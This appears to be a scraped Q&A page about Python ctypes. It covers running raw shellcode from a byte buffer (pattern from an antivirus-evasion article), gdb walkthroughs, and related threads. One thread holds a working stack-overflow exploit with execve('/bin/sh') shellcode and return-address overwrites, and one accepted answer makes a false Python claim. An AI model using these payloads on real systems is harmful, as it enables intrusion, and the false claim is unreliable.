ctypes: Cast string to function?


I was reading the article Tips for Evading Anti-Virus During Pen Testing and was surprised by the following Python program:
from ctypes import *
shellcode = '\xfc\xe8\x89\x00\x00....'
memorywithshell = create_string_buffer(shellcode, len(shellcode))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()
The shellcode is shortened. Can someone explain what is going on? I'm familiar with both Python and C, and I've tried reading up on the ctypes module, but there are two main questions left:
What is stored in shellcode?
I know this has something to do with C (in the article it is shellcode from Metasploit, and a different notation for ASCII was chosen), but I cannot tell whether it's C source (probably not) or the output of some sort of compilation (which?).
Depending on the first question, what's the magic happening during the cast?

Have a look at this shellcode, I took it from here (it pops up a MessageBoxA):
#include <stdio.h>
typedef void (* function_t)(void);
unsigned char shellcode[] =
"\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
"\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
"\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
"\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
"\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72"
"\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F"
"\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01"
"\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65"
"\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B"
"\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42"
"\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24"
"\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57"
"\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01"
"\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F"
"\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24"
"\x40\xFF\x54\x24\x40\x57\xFF\xD0";
void real_function(void) {
puts("I'm here");
}
int main(int argc, char **argv)
{
function_t function = (function_t) &shellcode[0];
real_function();
function();
return 0;
}
Compile it and run it under any debugger; I'll use gdb:
> gcc shellcode.c -o shellcode
> gdb -q shellcode.exe
Reading symbols from shellcode.exe...done.
(gdb)
>
Disassemble the main function to see the difference between calling real_function and function:
(gdb) disassemble main
Dump of assembler code for function main:
0x004013a0 <+0>: push %ebp
0x004013a1 <+1>: mov %esp,%ebp
0x004013a3 <+3>: and $0xfffffff0,%esp
0x004013a6 <+6>: sub $0x10,%esp
0x004013a9 <+9>: call 0x4018e4 <__main>
0x004013ae <+14>: movl $0x402000,0xc(%esp)
0x004013b6 <+22>: call 0x40138c <real_function> ; <- here we call our `real_function`
0x004013bb <+27>: mov 0xc(%esp),%eax
0x004013bf <+31>: call *%eax ; <- here we call the address that is loaded in eax (the address of the beginning of our shellcode)
0x004013c1 <+33>: mov $0x0,%eax
0x004013c6 <+38>: leave
0x004013c7 <+39>: ret
End of assembler dump.
(gdb)
There are two calls. Let's set a breakpoint at <main+31> to see what is loaded in eax:
(gdb) break *(main+31)
Breakpoint 1 at 0x4013bf
(gdb) run
Starting program: shellcode.exe
[New Thread 2856.0xb24]
I'm here
Breakpoint 1, 0x004013bf in main ()
(gdb) disassemble
Dump of assembler code for function main:
0x004013a0 <+0>: push %ebp
0x004013a1 <+1>: mov %esp,%ebp
0x004013a3 <+3>: and $0xfffffff0,%esp
0x004013a6 <+6>: sub $0x10,%esp
0x004013a9 <+9>: call 0x4018e4 <__main>
0x004013ae <+14>: movl $0x402000,0xc(%esp)
0x004013b6 <+22>: call 0x40138c <real_function>
0x004013bb <+27>: mov 0xc(%esp),%eax
=> 0x004013bf <+31>: call *%eax ; now we are here
0x004013c1 <+33>: mov $0x0,%eax
0x004013c6 <+38>: leave
0x004013c7 <+39>: ret
End of assembler dump.
(gdb)
Look at the first 3 bytes of the data at the address held in eax:
(gdb) x/3x $eax
0x402000 <shellcode>: 0xfc 0x33 0xd2
(gdb) ^-------^--------^---- the first 3 bytes of the shellcode
So the CPU will call 0x402000, the beginning of our shellcode. Let's disassemble whatever is at 0x402000:
(gdb) disassemble 0x402000
Dump of assembler code for function shellcode:
0x00402000 <+0>: cld
0x00402001 <+1>: xor %edx,%edx
0x00402003 <+3>: mov $0x30,%dl
0x00402005 <+5>: pushl %fs:(%edx)
0x00402008 <+8>: pop %edx
0x00402009 <+9>: mov 0xc(%edx),%edx
0x0040200c <+12>: mov 0x14(%edx),%edx
0x0040200f <+15>: mov 0x28(%edx),%esi
0x00402012 <+18>: xor %ecx,%ecx
0x00402014 <+20>: mov $0x18,%cl
0x00402016 <+22>: xor %edi,%edi
0x00402018 <+24>: xor %eax,%eax
0x0040201a <+26>: lods %ds:(%esi),%al
0x0040201b <+27>: cmp $0x61,%al
0x0040201d <+29>: jl 0x402021 <shellcode+33>
....
As you can see, shellcode is nothing more than assembly instructions. The only difference is in the way you write these instructions: it uses special techniques to make it more portable, for example never using a fixed address.
The Python equivalent of the above program:
#!python
from ctypes import *
shellcode_data = "\
\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B\
\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9\
\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C\
\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0\
\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B\
\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72\
\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03\
\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47\
\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F\
\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72\
\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66\
\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14\
\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72\
\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F\
\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01\
\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65\
\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B\
\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42\
\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24\
\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57\
\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01\
\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F\
\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24\
\x40\xFF\x54\x24\x40\x57\xFF\xD0"
shellcode = c_char_p(shellcode_data)
function = cast(shellcode, CFUNCTYPE(None))
function()

shellcode, if I'm not mistaken, contains architecture-specific compiled code that roughly translates as a function call (I'm not an architecture expert, and the code is truncated...).
Therefore, once you've created a C-style string with create_string_buffer, you can fool Python into thinking that it is a function with the cast call. Python then executes the code originally contained in shellcode.
There's a helpful link here: http://www.blackhatlibrary.net/Python#Ctypes
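What cast does here can be seen without any machine code. The following is a minimal sketch, assuming only the standard ctypes module: it takes the address of an ordinary Python callback and rebuilds a callable from that bare address. The names PROTO, double_it, and reborn are made up for this illustration.

```python
import ctypes

# Signature "int f(int)"; PROTO is a hypothetical name used only in this sketch.
PROTO = ctypes.CFUNCTYPE(ctypes.c_int, ctypes.c_int)

def double_it(n):
    return 2 * n

# Wrap the Python function so that it has a real C-callable address.
# Keep this object alive for as long as the address is in use.
callback = PROTO(double_it)

# A function pointer is just a number: the address where the code starts.
address = ctypes.cast(callback, ctypes.c_void_p).value

# Rebuild a callable from the bare address plus a signature.
reborn = PROTO(address)
result = reborn(21)
print(result)
```

ctypes does not check what lives at the address. It trusts the signature it is given, which is why the snippet in the question can treat a byte buffer as a function.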

Let us not forget that for code to be executable, it has to be in a format that your machine understands. What you are doing there is providing a sequence of machine-code bytes that your CPU can interpret directly, so you can tell your machine to execute it. You are effectively skipping the job of a compiler by providing the final bytes; this technique is common in Just-In-Time compilers, which have to create executable code while the program is running.
So this actually has little to no relation to C (or Python, or any other language), but a great deal to do with the details of the architecture this code is expected to run on.
The first byte there is CLD (0xfc), followed by a CALL instruction (0xe8), which makes the code jump to an address computed from the offset given in the next 4 bytes of the sequence, and so on.
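To see that the literal is plain data rather than source code, the bytes can be inspected from Python. This is a small sketch using only the five bytes visible in the question; the rest of the payload is elided there and is not reconstructed here.

```python
# Only the bytes shown in the question; the remainder is elided in the source.
prefix = b"\xfc\xe8\x89\x00\x00"

# Each \xNN escape is one byte, written as two hex digits.
as_hex = prefix.hex(" ")
length = len(prefix)

# The same notation can spell printable ASCII: \x41 is "A", \x42 is "B".
same_as_ascii = b"\x41\x42" == b"AB"

print(as_hex, length, same_as_ascii)
```

The escape notation is only a way of writing arbitrary byte values in a string literal. What those bytes mean depends entirely on the CPU that is asked to execute them.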

Related

Changing Python integer in memory using ctypes module and GDB session

My question is based on this reddit post. The example there shows how to change an integer in memory using cast function from the ctypes module:
>>> import ctypes
>>> ctypes.cast(id(29), ctypes.POINTER(ctypes.c_long))[3] = 100
>>> 29
100
I'm interested in the low level internals here and I've checked this in GDB session by setting a breakpoint on the cast function in CPython:
(gdb) break cast
Function "cast" not defined.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 1 (cast) pending.
(gdb) run test.py
Starting program: /root/.pyenv/versions/3.8.0-debug/bin/python test.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
0x7ffff00e7b40
Breakpoint 1, cast (ptr=0x9e6e40 <small_ints+1088>, src=10382912, ctype=<_ctypes.PyCPointerType at remote 0xa812a0>) at /root/.pyenv/sources/3.8.0-debug/Python-3.8.0/Modules/_ctypes/_ctypes.c:5540
5540 if (0 == cast_check_pointertype(ctype))
(gdb) p *(PyLongObject *) ptr
$38 = {
ob_base = {
ob_base = {
ob_refcnt = 12,
ob_type = 0x9b8060 <PyLong_Type>
},
ob_size = 1
},
ob_digit = {100}
}
(gdb) p *((long *) ptr + 3)
$39 = 100
(gdb) p ((long *) ptr + 3)
$40 = (long *) 0x9e6e58 <small_ints+1112>
(gdb) p *((char *) ptr + 3 * 8)
$41 = 100 'd'
(gdb) p ((char *) ptr + 3 * 8)
$42 = 0x9e6e58 <small_ints+1112> "d"
(gdb) set *((long *) ptr + 3) = 29
(gdb) p *((long *) ptr + 3)
$46 = 29
(gdb) p *((char *) ptr + 3 * 8)
$47 = 29 '\035'
I would like to know if it's possible to get the memory address using Python in the GDB session because I couldn't access the returned addresses:
(gdb) python print("{:#x}".format(ctypes.addressof(ctypes.c_int(29))))
0x7f1053c947f0
(gdb) python print("{:#x}".format(id(29)))
0x22699d8
(gdb) p *0x7f1053c947f0
Cannot access memory at address 0x7f1053c947f0
(gdb) p *0x22699d8
Cannot access memory at address 0x22699d8
The indexing is also different compared to the Python REPL. I guess this is related to endianness?
(gdb) python print(ctypes.cast(id(29), ctypes.POINTER(ctypes.c_long))[3])
9
(gdb) python print (ctypes.cast(id(29), ctypes.POINTER(ctypes.c_long))[2])
29
Questions:
Why are memory addresses from Python in the GDB session not accessible, and why are the values not in the process memory range (info proc mappings)?
Why is the indexing different compared to the Python REPL?
(bonus question) I would expect the src parameter in the CPython cast function to hold the address of the object, but it seems to be ptr instead, and after memcpy, result->b_ptr points to a different value than &ptr. Is this where the actual casting happens?

Your Python process is not a real Python process; rather, GDB is running a Python REPL for you. Imagine it as another thread inside of GDB. Of course, this is a simplification; see the GDB docs for details.
I was unable to reproduce this behaviour:
(gdb) python
>import ctypes
>print(ctypes.cast(id(29), ctypes.POINTER(ctypes.c_long))[3])
>end
29
I can't think of any reason this behaviour would happen (least of all endianness, which is the same across your entire system*)
The src parameter appears to be used as the origin type, rather than the origin object. For reference, see ctypes.h and ctypes/__init__.py (_SimpleCData is just CDataObject with some helpers like indexing and repr). And yes, the memcpy is what does the actual casting in this case, although if you are casting between two data types, there is additional work beforehand.
* Except on ARM, where you can change endianness with an instruction
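The indices in the question are offsets into the object header, counted in pointer-sized words. The sketch below only reads memory and assumes a standard CPython build (not a free-threaded or Py_TRACE_REFS build, whose headers are laid out differently): word 0 is the reference count and word 1 is the type pointer. Where the integer's value sits after that depends on the Python version, so an embedded interpreter of a different version than the debugged one could plausibly explain a shifted index. That explanation is an assumption; nothing in the thread confirms it.

```python
import ctypes

value = 10**6  # any int object will do

# View the object's memory as an array of pointer-sized words.
# In CPython, id() returns the object's address.
words = ctypes.cast(id(value), ctypes.POINTER(ctypes.c_void_p))

# Word 1 of the header is ob_type on a standard build (assumption, see above).
type_pointer = words[1]
points_at_int_type = (type_pointer == id(type(value)))

print(hex(type_pointer), points_at_int_type)
```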

Ctypes executes callback function, then incorrectly calls the dll again

I wrote a dll in NASM to be called from Python using ctypes. I created a short Python callback program within my ctypes wrapper:
def LibraryCall(a):
    b = math.ceil(a)
    return b
I know the dll calls the callback function because when I step through the ctypes wrapper, the cursor jumps to the callback function, performs the callback, and returns to call the dll again, which seems to be the problem.
The Python ctypes code is:
import ctypes
import math

def SimpleTestFunction_asm(X):
    Input_Length_Array = []
    Input_Length_Array.append(len(X))
    CA_X = (ctypes.c_double * len(X))(*X)
    length_array_out = (ctypes.c_double * len(Input_Length_Array))(*Input_Length_Array)
    hDLL = ctypes.WinDLL("C:/Test_Projects/SimpleTestFunction/SimpleTestFunction.dll")
    CallName = hDLL.Main_Entry_fn
    CallName.argtypes = [ctypes.POINTER(ctypes.c_double), ctypes.POINTER(ctypes.c_double), ctypes.POINTER(ctypes.c_longlong)]
    CallName.restype = ctypes.c_int64
    #__________
    # The callback function
    LibraryCB = ctypes.WINFUNCTYPE(ctypes.c_double, ctypes.c_double)
    def LibraryCall(a):  # CALLBACK FUNCTION IN PYTHON
        b = math.ceil(a)
        return b
    lib_call = LibraryCB(LibraryCall)
    lib_call = ctypes.cast(lib_call, ctypes.POINTER(ctypes.c_longlong))
    #__________
    ret_ptr = CallName(CA_X, length_array_out, lib_call)  # CALL TO DLL
    a = ret_ptr[:2]
    n0 = ctypes.cast(a[0], ctypes.POINTER(ctypes.c_double))
    n0_size = int(a[0+1] / 8)
    x0 = n0[:n0_size]
When I step through the program, what happens now is that the cursor jumps from the line marked "CALL TO DLL" to the line marked "CALLBACK FUNCTION IN PYTHON." It executes the Python callback program correctly, then the cursor jumps back to the line marked "CALL TO DLL" at which point it crashes with no error message. It seems like it returns back to call the DLL again, but I want it to execute the callback function and return the result back to the already-called DLL.
Here is the simple NASM test code:
; Header Section
[BITS 64]
[default rel]
export Main_Entry_fn
export FreeMem_fn
extern malloc, realloc, free
section .data align=16
[DATA SECTION OMITTED FOR BREVITY]
section .text
SimpleTestFunction_fn:
xor rcx,rcx
mov [loop_counter_401],rcx
label_401:
lea rdi,[rel X_ptr]
mov rbp,qword [rdi] ; Pointer
mov rcx,[loop_counter_401]
mov rax,[X_length]
cmp rcx,rax
jge exit_label_for_SimpleTestFunction_fn
movsd xmm0,qword[rbp+rcx]
movsd [x_var],xmm0
;______
movsd xmm1,[const_40]
mulsd xmm0,xmm1
movsd [a],xmm0
movsd xmm0,[a]
call [CB_Pointer] ; THIS IS THE CALL TO THE CALLBACK FUNCTION
movsd [b],xmm0
ret
;__________
;Free the memory
FreeMem_fn:
;The pointer is passed back in rcx (of course)
sub rsp,40
call free
add rsp,40
ret
; __________
; Main Entry
Main_Entry_fn:
push rdi
push rbp
mov [X_ptr],rcx
mov [data_master_ptr],rdx
mov [CB_Pointer],r8
; Now assign lengths
lea rdi,[data_master_ptr]
mov rbp,[rdi]
xor rcx,rcx
movsd xmm0,qword[rbp+rcx]
cvttsd2si rax,xmm0
mov [X_length],rax
add rcx,8
; __________
; malloc for dynamic arrays
lea rdi,[data_master_ptr]
mov rbp,[rdi]
movsd xmm0,qword[rbp]
cvttsd2si rax,xmm0
mov [initial_dynamic_length],rax
mov rcx,qword[initial_dynamic_length] ; Initial size
xor rax,rax
sub rsp,40
call malloc
mov qword [collect_ptr],rax
add rsp,40
mov rax,[initial_dynamic_length]
mov [collect_length],rax
; __________
call SimpleTestFunction_fn
exit_label_for_Main_Entry_fn:
pop rbp
pop rdi
ret
I have already confirmed that the problem is not in the dll, because it returns to Python at the line where it calls the callback function, but it does not return a value to the dll after it executes the callback function; instead, it calls the dll again.
So to sum it up, after the call to the callback function, ctypes returns to call the dll again, which is not what I want.
Thanks very much for any ideas on how to solve this.

The simple answer to this question is that the return must be in parentheses: return (b). With that, it works correctly.
However, there is now a problem with ctypes crashing on exit. I posted that as a separate question at Python ctypes callback crashes on exit with exception code c0000005.
Thanks.
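For reference, a callback with this signature can be exercised from Python alone, with no DLL involved. This is a sketch under assumptions, not the asker's code: it uses the portable CFUNCTYPE instead of WINFUNCTYPE, and the names CEIL_CB and ceil_callback are made up. It converts the result to float explicitly so the value matches the declared c_double return type, and it keeps a reference to the callback object, which the ctypes documentation asks for as long as C code may call it.

```python
import ctypes
import math

# double callback(double); CEIL_CB is a hypothetical name for this sketch.
CEIL_CB = ctypes.CFUNCTYPE(ctypes.c_double, ctypes.c_double)

def ceil_callback(a):
    # math.ceil returns an int in Python 3; return a float to match c_double.
    return float(math.ceil(a))

# Keep lib_call referenced for as long as native code might call it.
lib_call = CEIL_CB(ceil_callback)

# Calling the wrapper goes through the same C-level entry point a DLL would use.
result = lib_call(2.3)
print(result)
```

If this runs cleanly on its own, the Python side of the callback is probably sound, and the remaining suspects are the calling convention and stack handling on the native side.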

Why is my stack buffer overflow exploit not working?

So I have a really simple stack overflow:
#include <stdio.h>
int main(int argc, char *argv[]) {
char buf[256];
memcpy(buf, argv[1],strlen(argv[1]));
printf(buf);
}
I'm trying to overflow with this code:
$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*237 + 'c8f4ffbf'.decode('hex')")
When I overflow the stack, I successfully overwrite EIP with my wanted address but then nothing happens. It doesn't execute my shellcode.
Does anyone see the problem? Note: My python may be wrong.
UPDATE
What I don't understand is why my code is not executing. For instance if I point eip to nops, the nops never get executed. Like so,
$(python -c "print '\x90'*50 + 'A'*210 + '\xc8\xf4\xff\xbf'")
UPDATE
Could someone be kind enough to exploit this overflow yourself on Linux x86 and post the results?
UPDATE
Never mind, y'all, I got it working. Thanks for all your help.
UPDATE
Well, I thought I did. I did get a shell, but now I'm trying again and I'm having problems.
All I'm doing is overflowing the stack at the beginning and pointing my shellcode there.
Like so,
r $(python -c 'print "A"*260 + "\xcc\xf5\xff\xbf"')
This should point to the A's. Now what I don't understand is why my address at the end gets changed in gdb.
This is what gdb gives me,
Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff5cd in ?? ()
The \xcc gets changed to \xcd. Could this have something to do with the error I get with gdb?
When I fill that address with "B"'s for instance it resolves fine with \x42\x42\x42\x42. So what gives?
Any help would be appreciated.
Also, I'm compiling with the following options:
gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o so so.c
It's really odd because any other address works except the one I need.
UPDATE
I can successfully spawn a shell with the following in gdb,
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
But I don't understand why this works sometimes and doesn't work other times. Sometimes my overwritten eip is changed by gdb. Does anyone know what I am missing? Also, I can only spawn a shell in gdb and not in the normal process. And on top of that, I can only seem to start a shell once in gdb and then gdb stops working.
For instance, now when I run the following I get this in gdb...
Starting program: /root/so $(python -c 'print "A"*260 + "\xc8\xf4\xff\xbf"')
Program received signal SIGSEGV, Segmentation fault.
0xbffff5cc in ?? ()
This seems to be caused by execstack being turned on.
UPDATE
Yeah, for some reason I'm getting different results but the exploit is working now. So thank you everyone for your help. If anyone can explain the results I received above, I'm all ears. Thanks.

The compiler and toolchain provide several protections against this kind of attack. For example, your stack may not be executable.
readelf -l <filename>
If your output contains something like this:
GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4
this means that you can only read and write on the stack ( so you should "return to libc" to spawn your shell).
Also there could be a canary protection, meaning there is a part of the memory between your variables and the instruction pointer that contains a phrase that is checked for integrity and if it is overwritten by your string the program will exit.
If you are trying this on your own program, consider removing some of the protections with gcc options:
gcc -z execstack
Also a note on your assembly, you usually include nops before your shell code, so you don't have to target the exact address that your shell code is starting.
$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")
Note that in the address that should be placed inside the instruction pointer
you can modify the last hex digits to point somewhere inside your nops and not
necessarily at the beginning of your buffer.
Of course gdb should become your best friend if you are trying something
like that.
Hope this helps.

This isn't going to work too well [as written]. However, it is possible, so read on ...
It helps to know what the actual stack layout is when the main function is called. It's a bit more complicated than most people realize.
Assuming a POSIX OS (e.g. linux), the kernel will set the stack pointer at a fixed address.
The kernel does the following:
It calculates how much space is needed for the environment variable strings (i.e. strlen("HOME=/home/me") + 1 for all environment variables) and "pushes" these strings onto the stack in a downward [towards lower memory] direction. It then calculates how many there were (e.g. envcount), creates a char *envp[envcount + 1] on the stack, and fills in the envp values with pointers to the given strings. It null-terminates this envp.
A similar process is done for the argv strings.
Then, the kernel loads the ELF interpreter. The kernel starts the process with the starting address of the ELF interpreter. The ELF interpreter [eventually] invokes the "start" function (e.g. _start from crt0.o), which does some init and then calls main(argc,argv,envp).
This is [sort of] what the stack looks like when main gets called:
"HOME=/home/me"
"LOGNAME=me"
"SHELL=/bin/sh"
// alignment pad ...
char *envp[4] = {
// address of "HOME" string
// address of "LOGNAME" string
// address of "SHELL" string
NULL
};
// string for argv[0] ...
// string for argv[1] ...
// ...
char *argv[] = {
// pointer to argument string 0
// pointer to argument string 1
// pointer to argument string 2
NULL
}
// possibly more stuff put in by ELF interpreter ...
// possibly more stuff put in by _start function ...
On x86-64 (System V ABI), the argc, argv, and envp values are passed to main in the first three argument registers.
Here's the problem [problems, plural, actually] ...
By the time all this is done, you have little to no idea what the address of the shell code is. So, any code you write must be RIP-relative addressing and [probably] built with -fPIC.
And, the resultant code can't have a zero byte in the middle because this is being conveyed [by the kernel] as an EOS terminated string. So, a string that has a zero (e.g. <byte0>,<byte1>,<byte2>,0x00,<byte5>,<byte6>,...) would only transfer the first three bytes and not the entire shell code program.
Nor do you have a good idea as to what the stack pointer value is.
Also, you need to find the memory word on the stack that has the return address in it (i.e. this is what the start function's call main asm instruction pushes).
This word containing the return address must be set to the address of the shell code. But, it doesn't always have a fixed offset relative to a main stack frame variable (e.g. buf). So, you can't predict what word on the stack to modify to get the "return to shellcode" effect.
Also, on x86 architectures, there is special mitigation hardware. For example, a page can be marked NX [no execute]. This is usually done for certain segments, such as the stack. If the RIP is changed to point to the stack, the hardware will fault out.
Here's the [easy] solution ...
gcc has some intrinsic functions that can help: __builtin_return_address, __builtin_frame_address.
So, get the value of the real return address from the intrinsic [call this retadr]. Get the address of the stack frame [call this fp].
Starting from fp and incrementing (by sizeof(void*)) toward higher memory, find a word that matches retadr. This memory location is the one you want to modify to point to the shell code. It will probably be at offset 0 or 8.
So, then do: *fp = argv[1] and return.
Note, extra steps may be necessary because if the stack has the NX bit set, the string pointed to by argv[1] is on the stack as mentioned above.
Here is some example code that works:
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
void
shellcode(void)
{
static char buf[] = "shellcode: hello\n";
char *cp;
for (cp = buf; *cp != 0; ++cp);
// NOTE: in real shell code, we couldn't rely on using this function, so
// these would need to be the CPP macro versions: _syscall3 and _syscall2
// respectively or the syscall function would need to be _statically_
// linked in
syscall(SYS_write,1,buf,cp - buf);
syscall(SYS_exit,0);
}
int
main(int argc,char **argv)
{
void *retadr = __builtin_return_address(0);
void **fp = __builtin_frame_address(0);
int iter;
printf("retadr=%p\n",retadr);
printf("fp=%p\n",fp);
// NOTE: for your example, replace:
// *fp = (void *) shellcode;
// with:
// *fp = (void *) argv[1]
for (iter = 20; iter > 0; --iter, fp += 1) {
printf("fp=%p %p\n",fp,*fp);
if (*fp == retadr) {
*fp = (void *) shellcode;
break;
}
}
if (iter <= 0)
printf("main: no match\n");
return 0;
}

I was having similar problems when trying to perform a stack buffer overflow. I found that my return address in GDB was different than that in a normal process. What I did was add the following:
unsigned long printesp(void){
__asm__("movl %esp,%eax");
}
And called it at the end of main, right before the return, to get an idea of where the stack was. From there I just played with that value, subtracting 4 from the printed ESP until it worked.

C function name-dependent segfault with Python ctypes

I'm getting a really weird crash when using ctypes in Python, but I'm not sure if the problem comes from Python or C.
Here is the C source (in test.c):
#include <stdio.h>
void compress(char *a, int b) {
printf("inside\n");
}
void run() {
printf("before\n");
compress("hi", 2);
printf("after\n");
}
Then here's what happens when I call run() with ctypes:
$ python -c 'import ctypes; ctypes.cdll.LoadLibrary("./test.so").run()'
before
Segmentation fault (core dumped)
The weirdest thing is that the crash doesn't happen when I rename compress() to anything else.
Other things that prevent it from crashing:
Calling compress() directly
Calling run() or compress() from C directly (If I add a main(), compile it directly, and execute it)
Removing either argument from the signature of compress() (but then the function doesn't seem to execute, based on the lack of "inside" being printed).
I'm pretty new to C, so I'm assuming there's something I'm missing here. What could be causing this?
System info:
Python 2.7.6
gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04)
Ubuntu 14.04
uname -r: 3.13.0-58-generic

According to the debugging, the program is trying to call compress in libz.so.1.
$ gdb python -c core
...
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Core was generated by `python -c import ctypes; ctypes.cdll.LoadLibrary("./test.so").run()'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x00007f9ddea18bff in compress2 () from /lib/x86_64-linux-gnu/libz.so.1
which accepts different parameters (zlib.h):
ZEXTERN int ZEXPORT compress OF((Bytef *dest, uLongf *destLen,
const Bytef *source, uLong sourceLen));
ZEXTERN int ZEXPORT compress2 OF((Bytef *dest, uLongf *destLen,
const Bytef *source, uLong sourceLen,
int level));
You can modify the compress function to be static to work around the issue:
static void compress(char *a, int b)
{
printf("inside\n");
}
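Before naming an exported function, it can help to check whether that name already resolves in the running process. This is a rough sketch, assuming a POSIX system where ctypes.CDLL(None) returns a handle for the whole process. The helper name symbol_already_loaded is made up, and on platforms where that call fails the helper simply reports False.

```python
import ctypes

def symbol_already_loaded(name):
    """Return True if `name` resolves in the current process's global scope."""
    try:
        # POSIX: dlopen(NULL) gives a handle covering the main program
        # and the libraries loaded into its global symbol scope.
        process = ctypes.CDLL(None)
    except (OSError, TypeError):
        # Assumption: platforms without this behaviour end up here.
        return False
    # Attribute lookup on a CDLL raises AttributeError for unknown symbols,
    # which hasattr turns into False.
    return hasattr(process, name)

for candidate in ("compress", "definitely_not_a_real_symbol_12345"):
    print(candidate, symbol_already_loaded(candidate))
```

Whether compress shows up depends on how the Python interpreter was built and which libraries it has loaded, so the result for that name will differ between systems.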

While @falsetru has diagnosed the problem, his solution won't work in the general case where you have a lot of files to statically link together (because the entire point of declaring things static is to not have them visible from other files).
And while @eryksun has posted a solution for when you want to declare a function the same name as another, in general, you may have a lot of C functions you don't want to export, and you don't want to have to worry about whether they collide with some random function in some library that Python happens to import, and you don't want to have to prefix every one of your internal functions with an attribute.
(GCC maintains documentation on function attributes, including this function visibility feature.)
A more general solution to avoiding namespace collisions is to tell the linker not to export any symbols by default, and then to mark only those functions you want exported, like run(), as visible.
There is probably a standard way to define the macro for this, but my C is so out-of-date I wouldn't know it. In any case, this will work:
#include <stdio.h>
#define EXPORT __attribute__((visibility("protected")))
void compress(char *a, int b) {
printf("inside\n");
}
EXPORT void run() {
printf("before\n");
compress("hi", 2);
printf("after\n");
}
You can link and run it like this:
$ gcc -x c test.c --shared -fvisibility=hidden -o test.so
$ python -c 'import ctypes; ctypes.cdll.LoadLibrary("./test.so").run()'
before
inside
after

How can I call inlined machine code in Python on Linux?

I'm trying to call inlined machine code from pure Python code on Linux. To this end, I embed the code in a bytes literal
code = b"\x55\x89\xe5\x5d\xc3"
and then call mprotect() via ctypes to allow execution of the page containing the code. Finally, I try to use ctypes to call the code. Here is my full code:
#!/usr/bin/python3
from ctypes import *
# Initialise ctypes prototype for mprotect().
# According to the manpage:
# int mprotect(const void *addr, size_t len, int prot);
libc = CDLL("libc.so.6")
mprotect = libc.mprotect
mprotect.restype = c_int
mprotect.argtypes = [c_void_p, c_size_t, c_int]
# PROT_xxxx constants
# Output of gcc -E -dM -x c /usr/include/sys/mman.h | grep PROT_
# #define PROT_NONE 0x0
# #define PROT_READ 0x1
# #define PROT_WRITE 0x2
# #define PROT_EXEC 0x4
# #define PROT_GROWSDOWN 0x01000000
# #define PROT_GROWSUP 0x02000000
PROT_NONE = 0x0
PROT_READ = 0x1
PROT_WRITE = 0x2
PROT_EXEC = 0x4
